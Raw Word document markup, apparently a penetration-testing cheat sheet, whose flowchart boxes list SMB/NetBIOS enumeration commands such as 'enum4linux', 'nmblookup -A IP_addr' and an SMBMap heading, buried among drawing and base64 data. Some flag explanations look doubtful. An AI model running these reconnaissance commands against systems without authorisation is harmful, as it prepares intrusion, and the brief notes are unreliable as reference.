ZuQgK81m9cau6/WQGMZ01vhZLpG+2D6q0aonmnRVzEr&#10;qYSVlDvnMmAvrEO71fRUSLVaJTNaMSfCjX10sidC5M5T8yzQdSwLxM9b6DdNzN/wrLWNI7Kw2gfQ&#10;ZSJhhLrFtRsBrWfiUveUxP1/LSerlwdv+QsAAP//AwBQSwMEFAAGAAgAAAAhALi3wi7cAAAACgEA&#10;AA8AAABkcnMvZG93bnJldi54bWxMj89OwzAMh+9IvENkJG4sWVtBV5pODMGBI4MH8JqsrdY4VZP+&#10;gafHnOBkW/708+dyv7pezHYMnScN240CYan2pqNGw+fH610OIkQkg70nq+HLBthX11clFsYv9G7n&#10;Y2wEh1AoUEMb41BIGerWOgwbP1ji3dmPDiOPYyPNiAuHu14mSt1Lhx3xhRYH+9za+nKcnIYXczib&#10;twtNDwcXhu8lS1DNida3N+vTI4ho1/gHw68+q0PFTic/kQmi15DlKmWUmy1XBvJstwNxYjJLU5BV&#10;Kf+/UP0AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAA&#10;AAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAwa3sOXMCAAA4BQAADgAAAAAAAAAA&#10;AAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAuLfCLtwAAAAKAQAADwAAAAAA&#10;AAAAAAAAAADN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1C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>enum4linux -i IP_addr</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF3">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t>&gt;&gt; -i = network interface</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="001C6DF3" w:rsidRDefault="001C6DF3" w:rsidP="001C6DF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16CAE" w:rsidRDefault="009F6E91" w:rsidP="00D16C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DB4435" wp14:editId="0AD45E34">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1267460</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3029585" cy="497840"/>
                <wp:effectExtent l="0" t="0" r="18415" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="50" name="Round Same Side Corner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497840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DF3" w:rsidRPr="003229F4" w:rsidRDefault="001C6DF3" w:rsidP="00D16CA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C6DF3">
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>nmblookup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4435" id="Round Same Side Corner Rectangle 50" o:spid="_x0000_s1053" style="position:absolute;margin-left:99.8pt;margin-top:.3pt;width:238.55pt;height:3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585,497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pKgAIAAEgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtvGjEQvlfqf7B8bxYo5IGyRIgoVaUo&#10;QSFVzsZrw0q2xx0bdumv79i7kCjNpVUvXs/OfPP8xtc3rTVsrzDU4Eo+PBtwppyEqnabkv94vvty&#10;yVmIwlXCgFMlP6jAb2afP103fqpGsAVTKWTkxIVp40u+jdFPiyLIrbIinIFXjpQa0IpIIm6KCkVD&#10;3q0pRoPBedEAVh5BqhDo722n5LPsX2sl46PWQUVmSk65xXxiPtfpLGbXYrpB4be17NMQ/5CFFbWj&#10;oCdXtyIKtsP6D1e2lggBdDyTYAvQupYq10DVDAfvqllthVe5FmpO8Kc2hf/nVj7sl8jqquQTao8T&#10;lmb0BDtXsRXd2aquFFsAOhrSEzVTuI1RjEypb40PU4Kv/BJ7KdA1NaHVaNOXymNt7vXh1GvVRibp&#10;59fB6GpyOeFMkm58dXE5zk6LV7THEL8psCxdSo4pq1HKKiWSmy329yFSbAIdjUlIeXWZ5Fs8GJWS&#10;Me5Jaao0xc7ozDG1MMj2gthh4jBVRb6yZYLo2pgTaPgRSEipXDzvgb19gqrMvb8BnxA5Mrh4Atva&#10;AX4U/TVl3dkfq+9qTuXHdt3m8Y4ujjNbQ3WgmSN0yxC8vKupw/cixKVAYj8RgTY6PtKhDTQlh/7G&#10;2Rbw10f/kz2RkrScNbRNJQ8/dwIVZ+a7I7peDcc0XxazMJ5cjEjAt5r1W43b2QXQSIb0dniZr8k+&#10;muNVI9gXWvx5ikoq4STFLrmMeBQWsdtyejqkms+zGa2cF/HerbxMzlOjE2+e2xeBvqdZJII+wHHz&#10;xPQdxzrbhHQw30XQdSZganXX134EtK6ZS/3Tkt6Dt3K2en0AZ78BAAD//wMAUEsDBBQABgAIAAAA&#10;IQCZVXzz3AAAAAcBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI7BTsMwEETvSPyDtUjcqAOHhIQ4VVsJ&#10;cUAgGvoB23gbR43tKHaa9O9ZTnAZaTSjmVeuF9uLC42h807B4yoBQa7xunOtgsP368MziBDRaey9&#10;IwVXCrCubm9KLLSf3Z4udWwFj7hQoAIT41BIGRpDFsPKD+Q4O/nRYmQ7tlKPOPO47eVTkqTSYuf4&#10;weBAO0PNuZ6sgvq6mz/TE0abfW0/3sz7dsLDXqn7u2XzAiLSEv/K8IvP6FAx09FPTgfRs8/zlKsK&#10;WDlOszQDcVSQ5QnIqpT/+asfAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHjZ2kqAAgAA&#10;SAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAJlVfPPc&#10;AAAABwEAAA8AAAAAAAAAAAAAAAAA2gQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADj&#10;BQAAAAA=&#10;" adj="-11796480,,5400" path="m82975,l2946610,v45826,,82975,37149,82975,82975l3029585,497840r,l,497840r,l,82975c,37149,37149,,82975,xe" fillcolor="#70ad47 [3209]" strokecolor="white [3201]" strokeweight="1.5pt">
                <v:stroke joinstyle="miter"/>
                <v:formulas/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="82975,0;2946610,0;3029585,82975;3029585,497840;3029585,497840;0,497840;0,497840;0,82975;82975,0" o:connectangles="0,0,0,0,0,0,0,0,0" textboxrect="0,0,3029585,497840"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="001C6DF3" w:rsidRPr="003229F4" w:rsidRDefault="001C6DF3" w:rsidP="00D16CAE">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="001C6DF3">
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>nmblookup</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0D9E" w:rsidRDefault="00476B3F" w:rsidP="00D16CA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EADBBF" wp14:editId="2DFD01A2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2508250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>215723</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="446227" cy="343815"/>
                <wp:effectExtent l="19050" t="0" r="11430" b="3746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7" cy="343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6071" id="Down Arrow 51" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:197.5pt;margin-top:17pt;width:35.15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HKdgIAAEAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFOGzEQvVfqP1i+l01CAjRig6IgqkoI&#10;okLF2Xjt7Eq2xx072aRf37F3syBAPVTNwbE9M29m3r7x5dXeGrZTGBpwJR+fjDhTTkLVuE3Jfz7e&#10;fLngLEThKmHAqZIfVOBXi8+fLls/VxOowVQKGYG4MG99yesY/bwogqyVFeEEvHJk1IBWRDripqhQ&#10;tIRuTTEZjc6KFrDyCFKFQLfXnZEvMr7WSsZ7rYOKzJScaot5xbw+p7VYXIr5BoWvG9mXIf6hCisa&#10;R0kHqGsRBdti8w7KNhIhgI4nEmwBWjdS5R6om/HoTTcPtfAq90LkBD/QFP4frLzbrZE1VclnY86c&#10;sPSNrqF1bIkILaNLYqj1YU6OD36N/SnQNrW712jTPzXC9pnVw8Cq2kcm6XI6PZtMzjmTZDqdnl6M&#10;ZwmzeAn2GOI3BZalTckrSp+zZ0LF7jbEzv/oR8Gpoq6GvIsHo1IZxv1QmrqhrJMcnXWkVgbZTpAC&#10;hJTKxXFnqkWluuvZiH59UUNELjEDJmTdGDNg9wBJo++xu1p7/xSqsgyH4NHfCuuCh4icGVwcgm3j&#10;AD8CMNRVn7nzP5LUUZNYeobqQN8aoRuC4OVNQ4TfihDXAkn1NB80yfGeFm2gLTn0O85qwN8f3Sd/&#10;EiNZOWtpikoefm0FKs7Md0cy/TqeTtPY5cN0dj6hA762PL+2uK1dAX0mUiJVl7fJP5rjViPYJxr4&#10;ZcpKJuEk5S65jHg8rGI33fRkSLVcZjcaNS/irXvwMoEnVpOWHvdPAn2vukhyvYPjxIn5G911vinS&#10;wXIbQTdZlC+89nzTmGbh9E9Kegden7PXy8O3+AMAAP//AwBQSwMEFAAGAAgAAAAhAIjb02PdAAAA&#10;CQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPwzAMhe9I/IfISNxYUrpNpTSdEBKcYasQx6wxbSFx&#10;SpNthV+POcHJtt7T8/eqzeydOOIUh0AasoUCgdQGO1Cnodk9XBUgYjJkjQuEGr4wwqY+P6tMacOJ&#10;nvG4TZ3gEIql0dCnNJZSxrZHb+IijEisvYXJm8Tn1Ek7mROHeyevlVpLbwbiD70Z8b7H9mN78Bq+&#10;B9kq//SS1Gv++f6YuSbLqdH68mK+uwWRcE5/ZvjFZ3SomWkfDmSjcBrymxV3SbwsebJhuV7lIPYa&#10;iiIDWVfyf4P6BwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAA&#10;AAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAyYMcp2AgAAQAUAAA4AAAAA&#10;AAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAIjb02PdAAAACQEAAA8A&#10;AAAAAAAAAAAAAAAA0AQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADaBQAAAAA=&#10;" adj="10800" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00476B3F" w:rsidRDefault="00276B73" w:rsidP="009F6E9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3C32F7" wp14:editId="0A7C1E0D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>716890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>189281</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1876425" cy="796925"/>
                <wp:effectExtent l="0" t="0" r="28575" b="2222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96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3F" w:rsidRDefault="00476B3F" w:rsidP="00276B73">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>nmblookup –h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C32F7" id="Rounded Rectangle 52" o:spid="_x0000_s1054" style="position:absolute;left:0;text-align:left;margin-left:56.45pt;margin-top:14.9pt;width:147.75pt;height:6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0mbwIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtqGzEQfS/0H4Tem7UX52ayDiYhpRCS&#10;4CTkWdZK9lKtRh3J3nW/viPtJSENtJS+aEc79zNndHHZ1obtFfoKbMGnRxPOlJVQVnZT8Oenmy9n&#10;nPkgbCkMWFXwg/L8cvH500Xj5iqHLZhSIaMg1s8bV/BtCG6eZV5uVS38EThlSakBaxHoipusRNFQ&#10;9Npk+WRykjWApUOQynv6e90p+SLF11rJcK+1V4GZglNtIZ2YznU8s8WFmG9QuG0l+zLEP1RRi8pS&#10;0jHUtQiC7bD6LVRdSQQPOhxJqDPQupIq9UDdTCfvunncCqdSLwSOdyNM/v+FlXf7B2RVWfDjnDMr&#10;aprRCna2VCVbEXrCboxipCOgGufnZP/oHrC/eRJj163GOn6pH9YmcA8juKoNTNLP6dnpySw/5kyS&#10;7vT85JxkCpO9ejv04auCmkWh4BjLiDUkYMX+1ofOfrAj51hSV0SSwsGoWIexK6Wpq5g2eSc+qSuD&#10;bC+ICUJKZcOQP1lHN10ZMzrmf3bs7aOrSlwbnf8i6+iRMoMNo3NdWcCPspffpz1kurMfEOj6jhCE&#10;dt2mceZnw8jWUB5oxggd+b2TNxUBfCt8eBBIbKe9oA0O93RoA03BoZc42wL+/Oh/tCcSkpazhran&#10;4P7HTqDizHyzRM/z6WwW1y1dZsenOV3wrWb9VmN39RXQWKb0VjiZxGgfzCBqhPqFFn0Zs5JKWEm5&#10;Cy4DDper0G01PRVSLZfJjFbMiXBrH50ciBC589S+CHQ9ywLx8w6GTRPzdzzrbOOILCx3AXSVSBih&#10;7nDtR0DrmbjcPyVx/9/ek9Xrg7f4BQAA//8DAFBLAwQUAAYACAAAACEAvpw+jNwAAAAKAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyPzU7DMBCE70i8g7WVuFGnJoU2jVNRBAeOLTzANnaTqPE6ip0feHqW&#10;ExxHM5r5Jt/PrhWj7UPjScNqmYCwVHrTUKXh8+PtfgMiRCSDrSer4csG2Be3Nzlmxk90tOMpVoJL&#10;KGSooY6xy6QMZW0dhqXvLLF38b3DyLKvpOlx4nLXSpUkj9JhQ7xQY2dfalteT4PT8GoOF/N+peHp&#10;4EL3PaUKk1FpfbeYn3cgop3jXxh+8RkdCmY6+4FMEC3rldpyVIPa8gUOpMkmBXFmZ71+AFnk8v+F&#10;4gcAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0Nv&#10;bnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAA&#10;AC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAuRa0mbwIAADgFAAAOAAAAAAAAAAAAAAAA&#10;AC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQC+nD6M3AAAAAoBAAAPAAAAAAAAAAAA&#10;AAAAAMk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76B3F" w:rsidRDefault="00476B3F" w:rsidP="00276B73">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>nmblookup –h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9794C" wp14:editId="097F300E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2874874</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>189281</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2691993" cy="797357"/>
                <wp:effectExtent l="0" t="0" r="13335" b="222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993" cy="7973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CAE" w:rsidRDefault="00D16CAE" w:rsidP="00276B73">
                            <w:r>
                              <w:t>nmblookup -A IP_addr</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00AE2ED3" w:rsidRDefault="000243A6" w:rsidP="00276B73">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">&gt;&gt; -A= </w:t>
                            </w:r>
                            <w:r w:rsidR="00276B73">
                              <w:t xml:space="preserve">to find the NetBIOS name associated with the </w:t>
                            </w:r>
                            <w:r w:rsidR="00276B73"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9794C" id="Rounded Rectangle 19" o:spid="_x0000_s1055" style="position:absolute;left:0;text-align:left;margin-left:226.35pt;margin-top:14.9pt;width:211.9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BtcQIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1r2zAQ/j7YfxD6vjpOX7KEOiWkdAxK&#10;W9qOflZkKTGTddpJiZ39+p1kxw1dYWPsi6zzvT/3nC6v2tqwnUJfgS14fjLiTFkJZWXXBf/2fPPp&#10;M2c+CFsKA1YVfK88v5p//HDZuJkawwZMqZBREOtnjSv4JgQ3yzIvN6oW/gScsqTUgLUIJOI6K1E0&#10;FL022Xg0usgawNIhSOU9/b3ulHye4mutZLjX2qvATMGptpBOTOcqntn8UszWKNymkn0Z4h+qqEVl&#10;KekQ6loEwbZY/RaqriSCBx1OJNQZaF1JlXqgbvLRm26eNsKp1AuB490Ak/9/YeXd7gFZVdLsppxZ&#10;UdOMHmFrS1WyR0JP2LVRjHQEVOP8jOyf3AP2kqdr7LrVWMcv9cPaBO5+AFe1gUn6Ob6Y5tPpKWeS&#10;dJPp5PR8EoNmr94OffiioGbxUnCMZcQaErBid+tDZ3+wI+dYUldEuoW9UbEOYx+Vpq4obZ68E5/U&#10;0iDbCWKCkFLZcN7nT9bRTVfGDI7jPzv29tFVJa4Nzn+RdfBImcGGwbmuLOB72cvveV+y7uwPCHR9&#10;RwhCu2rTOMfDyFZQ7mnGCB35vZM3FQF8K3x4EEhsp72gDQ73dGgDTcGhv3G2Afz53v9oTyQkLWcN&#10;bU/B/Y+tQMWZ+WqJntP87CyuWxLOzidjEvBYszrW2G29BBpLTm+Fk+ka7YM5XDVC/UKLvohZSSWs&#10;pNwFlwEPwjJ0W01PhVSLRTKjFXMi3NonJw9EiNx5bl8Eup5lgfh5B4dNE7M3POts44gsLLYBdJVI&#10;GKHucO1HQOuZuNw/JXH/j+Vk9frgzX8BAAD//wMAUEsDBBQABgAIAAAAIQD0bMfV3QAAAAoBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNZXYUadRHiXEqSiCBUsKHzCN3SRqPI5i5wFf&#10;z7CC5WiO7j23PKy2F7MZfedIwW4bgTBUO91Ro+Dz4/V+D8IHJI29I6Pgy3g4VLc3JRbaLfRu5lNo&#10;BIeQL1BBG8JQSOnr1lj0WzcY4t/FjRYDn2Mj9YgLh9texlGUSYsdcUOLg3luTX09TVbBiz5e9NuV&#10;pvxo/fC9JDFGc6zU3WZ9egQRzBr+YPjVZ3Wo2OnsJtJe9AqSNM4ZVRA/8AQG9nmWgTgzmaYJyKqU&#10;/ydUPwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAA&#10;AAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDoZbBtcQIAADgFAAAOAAAAAAAAAAAA&#10;AAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQD0bMfV3QAAAAoBAAAPAAAAAAAA&#10;AAAAAAAAAMs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16CAE" w:rsidRDefault="00D16CAE" w:rsidP="00276B73">
                      <w:r>
                        <w:t>nmblookup -A IP_addr</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00AE2ED3" w:rsidRDefault="000243A6" w:rsidP="00276B73">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">&gt;&gt; -A= </w:t>
                      </w:r>
                      <w:r w:rsidR="00276B73">
                        <w:t xml:space="preserve">to find the NetBIOS name associated with the </w:t>
                      </w:r>
                      <w:r w:rsidR="00276B73">
                        <w:t>IP address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6E91" w:rsidRDefault="009F6E91" w:rsidP="009F6E91">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00476B3F" w:rsidRDefault="00476B3F" w:rsidP="008D602E"/>
    <w:p w:rsidR="00D16CAE" w:rsidRDefault="00476B3F" w:rsidP="00D16CAE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="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ACCD32" wp14:editId="3348C564">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1228954</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>236449</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3066161" cy="498143"/>
                <wp:effectExtent l="0" t="0" r="20320" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="53" name="Round Same Sid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6161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B3F" w:rsidRPr="003229F4" w:rsidRDefault="00476B3F" w:rsidP="00476B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76B3F">
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>SMBMap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CD32" id="Round Same Side Corner Rectangle 53" o:spid="_x0000_s1056" style="position:absolute;margin-left:96.75pt;margin-top:18.6pt;width:241.45pt;height:3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6161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hrfgIAAEgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9v2jAQfp+0/8Hy+xoClLWooUJUnSZV&#10;bVU69dk4NkRyfN7ZkLC/fmcnQNXxsmkvyZ3vvvvl73xz29aG7RT6CmzB84sBZ8pKKCu7LviP1/sv&#10;V5z5IGwpDFhV8L3y/Hb2+dNN46ZqCBswpUJGQayfNq7gmxDcNMu83Kha+AtwypJRA9YikIrrrETR&#10;UPTaZMPBYJI1gKVDkMp7Or3rjHyW4mutZHjS2qvATMGptpC+mL6r+M1mN2K6RuE2lezLEP9QRS0q&#10;S0mPoe5EEGyL1R+h6koieNDhQkKdgdaVVKkH6iYffOhmuRFOpV5oON4dx+T/X1j5uHtGVpUFvxxx&#10;ZkVNd/QCW1uyJclsWZWKLQAtXdILDVPYtVGMXGlujfNTgi/dM/aaJzEOodVYxz+1x9o06/1x1qoN&#10;TNLhaDCZ5JOcM0m28fVVPk5BsxPaoQ/fFNQsCgXHWNUwVhULScMWuwcfKDeBDs6kxLq6SpIU9kbF&#10;Yox9UZo6jbkTOnFMLQyynSB2mJDHrihW8owQXRlzBOXnQEJKZcOkB/b+EaoS9/4GfESkzGDDEVxX&#10;FvBc9lPJuvM/dN/1HNsP7apN1ztKXI9HKyj3dOcI3TJ4J+8rmvCD8OFZILGf9oQ2OjzRRxtoCg69&#10;xNkG8Ne58+hPpCQrZw1tU8H9z61AxZn5bomu1/l4HNcvKePLr0NS8L1l9d5it/UC6EqIHVRdEqN/&#10;MAdRI9RvtPjzmJVMwkrKXXAZ8KAsQrfl9HRINZ8nN1o5J8KDXToZg8dBR968tm8CXU+zQAR9hMPm&#10;iekHjnW+EWlhvg2gq0TA01z7K6B1TVzqn5b4HrzXk9fpAZz9BgAA//8DAFBLAwQUAAYACAAAACEA&#10;qUXKM+AAAAAKAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQU7DMBBF90jcwRokNog6aUkCIU5VIbpp&#10;hSoCB3BiN4mwxyF203D7DitYfv2nP2+K9WwNm/Toe4cC4kUETGPjVI+tgM+P7f0jMB8kKmkcagE/&#10;2sO6vL4qZK7cGd/1VIWW0Qj6XAroQhhyzn3TaSv9wg0aqTu60cpAcWy5GuWZxq3hyyhKuZU90oVO&#10;Dvql081XdbICqrtD7Hav+8Rs6pC9Tdvs+3jYC3F7M2+egQU9hz8YfvVJHUpyqt0JlWeG8tMqIVTA&#10;KlsCIyDN0gdgNTVxkgIvC/7/hfICAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAIZnoa34C&#10;AABIBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAqUXK&#10;M+AAAAAKAQAADwAAAAAAAAAAAAAAAADYBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AOUFAAAAAA==&#10;" adj="-11796480,,5400" path="m83025,l2983136,v45853,,83025,37172,83025,83025l3066161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2983136,0;3066161,83025;3066161,498143;3066161,498143;0,498143;0,498143;0,83025;83025,0" o:connectangles="0,0,0,0,0,0,0,0,0" textboxrect="0,0,3066161,498143"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00476B3F" w:rsidRPr="003229F4" w:rsidRDefault="00476B3F" w:rsidP="00476B3F">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00476B3F">
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>SMBMap</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D16CAE">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D16CAE" w:rsidRDefault="00D628B3" w:rsidP="00D16CA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577901</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>133579</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="651053" cy="592531"/>
                <wp:effectExtent l="0" t="0" r="34925" b="36195"/>
                <wp:wrapNone/>
                <wp:docPr id="66" name="Half Fram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9253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385B" id="Half Frame 66" o:spid="_x0000_s1026" style="position:absolute;margin-left:45.5pt;margin-top:10.5pt;width:51.25pt;height:46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1053,592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KydwIAAEAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6r7bTJluDOEXQotuA&#10;og3WDj0rslQbkEWNUuJkXz9KdtyiLXYY5oNMieQj+URqcbFvDdsp9A3YkhcnOWfKSqga+1Tynw/X&#10;n75w5oOwlTBgVckPyvOL5ccPi87N1QRqMJVCRiDWzztX8joEN88yL2vVCn8CTllSasBWBNriU1ah&#10;6Ai9Ndkkz2dZB1g5BKm8p9OrXsmXCV9rJcOd1l4FZkpOuYW0Ylo3cc2WCzF/QuHqRg5piH/IohWN&#10;paAj1JUIgm2xeQPVNhLBgw4nEtoMtG6kSjVQNUX+qpr7WjiVaiFyvBtp8v8PVt7u1siaquSzGWdW&#10;tHRH34TR7BpJZnRIDHXOz8nw3q1x2HkSY7l7jW38UyFsn1g9jKyqfWCSDmfTIp+eciZJNT2fTE+L&#10;iJk9Ozv04auClkWBSqPwKXoiVOxufOjtj3bkHDPqc0hSOBgV0zD2h9JUDUWdJO/UR+rSINsJ6gAh&#10;pbKh6FW1qFR/PM3pG5IaPVKKCTAi68aYEXsAiD36FrvPdbCPriq14eic/y2x3nn0SJHBhtG5bSzg&#10;ewCGqhoi9/ZHknpqIksbqA501wj9EHgnrxsi/Eb4sBZIXU/zQZMc7mjRBrqSwyBxVgP+fu882tON&#10;kZazjqao5P7XVqDizHy31KbnxdlZHLu0OZt+ntAGX2o2LzV2214CXVNBb4aTSYz2wRxFjdA+0sCv&#10;YlRSCSspdsllwOPmMvTTTU+GVKtVMqNRcyLc2HsnI3hkNfbSw/5RoBu6LlC73sJx4sT8Vd/1ttHT&#10;wmobQDepKZ95HfimMU2NMzwp8R14uU9Wzw/f8g8AAAD//wMAUEsDBBQABgAIAAAAIQCtEjOf3gAA&#10;AAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXvgv9hGcGLtJuktZiYTVHBi6BgLT1vsmMS&#10;zM6G3Wmb/ns3Jz3NDO/x5nvldrKDOKEPvSMF6TIBgdQ401OrYP/1ungAEViT0YMjVHDBANvq+qrU&#10;hXFn+sTTjlsRQygUWkHHPBZShqZDq8PSjUhR+3beao6nb6Xx+hzD7SCzJNlIq3uKHzo94kuHzc/u&#10;aBWM60Pv/X6D7+6jJr7c5W/PGSt1ezM9PYJgnPjPDDN+RIcqMtXuSCaIQUGexiqsIJvnrOerexB1&#10;XNL1CmRVyv8Nql8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAA&#10;AAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAhcBSsncCAABABQAADgAA&#10;AAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEArRIzn94AAAAJAQAA&#10;DwAAAAAAAAAAAAAAAADRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" path="m,l651053,,434038,197508r-236530,l197508,412776,,592531,,xe" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
